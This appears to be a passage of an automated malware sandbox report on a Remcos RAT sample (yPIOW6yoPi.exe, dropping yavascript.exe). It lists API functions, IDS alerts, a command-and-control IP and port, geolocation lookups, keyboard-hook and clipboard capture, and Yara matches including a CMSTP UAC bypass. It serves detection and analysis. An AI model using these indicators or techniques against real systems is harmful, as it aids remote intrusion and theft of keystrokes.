            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,17_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_0075900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0075B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0075B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,17_2_0076B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0079D850 FindFirstFileExA,17_2_0079D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00757CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,17_2_00757CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00756D29 FindFirstFileW,FindNextFileW,17_2_00756D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00768ED0 FindFirstFileW,17_2_00768ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0044D5E9 FindFirstFileExA,20_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,20_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00406AC2 FindFirstFileW,FindNextFileW,20_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,20_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0213900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,20_2_0214B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0213B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0213B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0217D850 FindFirstFileExA,20_2_0217D850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02148ED0 FindFirstFileW,20_2_02148ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02137CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,20_2_02137CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02136D29 FindFirstFileW,FindNextFileW,20_2_02136D29
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0040B335
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0041B42F
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,38_2_0040B53A
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0044D5E9 FindFirstFileExA,38_2_0044D5E9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,38_2_004089A9
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00406AC2 FindFirstFileW,FindNextFileW,38_2_00406AC2
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_00407A8C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,38_2_00418C69
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,38_2_00408DA7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218900E __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,38_2_0218900E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219B696 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,38_2_0219B696
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0218B59C FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,38_2_0218B59C
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_021CD850 FindFirstFileExA,38_2_021CD850
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02198ED0 FindFirstFileW,38_2_02198ED0
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02187CF3 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,38_2_02187CF3
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02186D29 FindFirstFileW,FindNextFileW,38_2_02186D29
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00406F06

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49753 -> 198.23.227.212:32583
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorIPs: 198.23.227.212
            Source: global trafficTCP traffic: 192.168.2.6:49753 -> 198.23.227.212:32583
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 198.23.227.212 198.23.227.212
            Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49828 -> 178.237.33.50:80
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownTCP traffic detected without corresponding DNS query: 198.23.227.212
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004260F7 recv,0_2_004260F7
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: yavascript.exeString found in binary or memory: http://geoplugin.net/json.gp
            Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp.
            Source: yPIOW6yoPi.exe, 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yPIOW6yoPi.exe, 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, yPIOW6yoPi.exe, 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, yavascript.exe, 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp4
            Source: yavascript.exe, 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
            Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
            Source: yavascript.exe, 00000011.00000003.2391005348.000000000088D000.00000004.00000020.00020000.00000000.sdmp, yavascript.exe, 00000011.00000002.4625247428.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004099E4 SetWindowsHookExA 0000000D,004099D0,000000000_2_004099E4
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004159C6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,20_2_004159C6
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,38_2_004159C6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004159C6
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,0_2_00409B10
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.yPIOW6yoPi.exe.21d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.yPIOW6yoPi.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.2.yavascript.exe.2180e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 38.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.yavascript.exe.750e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.2.yavascript.exe.2130e67.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.3.yavascript.exe.21e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.3.yavascript.exe.2200000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000011.00000002.4625247428.000000000084E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295191627.00000000005A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378390823.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309481158.0000000000698000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000003.2355139636.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000003.2272754089.0000000002200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4624228504.0000000000750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378144683.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309595604.0000000002130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.4623907696.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000003.2263067478.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2151653856.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2378583588.0000000002180000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTR

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Contains functionalty to change the wallpaper
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041BB77 SystemParametersInfoW,0_2_0041BB77
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0210BDDE SystemParametersInfoW,0_2_0210BDDE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0041BB77 SystemParametersInfoW,17_2_0041BB77
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_0076BDDE SystemParametersInfoW,17_2_0076BDDE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0041BB77 SystemParametersInfoW,20_2_0041BB77
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_0214BDDE SystemParametersInfoW,20_2_0214BDDE
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0041BB77 SystemParametersInfoW,38_2_0041BB77
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_0219BDDE SystemParametersInfoW,38_2_0219BDDE

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.yavascript.exe.750e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0.2.yPIOW6yoPi.exe.20f0e67.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 20.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 17.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
